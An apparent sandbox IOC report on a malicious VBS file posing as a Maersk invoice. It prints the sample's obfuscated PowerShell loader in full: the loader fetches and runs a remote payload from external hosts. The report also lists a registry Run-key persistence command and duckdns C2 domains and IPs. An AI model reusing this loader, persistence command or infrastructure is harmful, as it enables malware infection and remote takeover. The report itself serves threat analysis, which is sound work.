IOC Report
Maersk_BL_Invoice_Packinglist.vbs

Maersk_BL_Invoice_Packinglist.vbs

ASCII text, with very long lines (2004), with CRLF line terminators

initial sample

C:\Users\user\AppData\Roaming\kpburtts.dat

data

dropped

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"

C:\Windows\System32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"

janbours92harbu02.duckdns.org

janbours92harbu02.duckdns.org

206.123.148.198

janbours92harbu03.duckdns.org

unknown

206.123.148.198

janbours92harbu02.duckdns.org

United States

5FB4000

heap

page read and write

5192000

remote allocation

page execute and read and write

A152000

direct allocation

page execute and read and write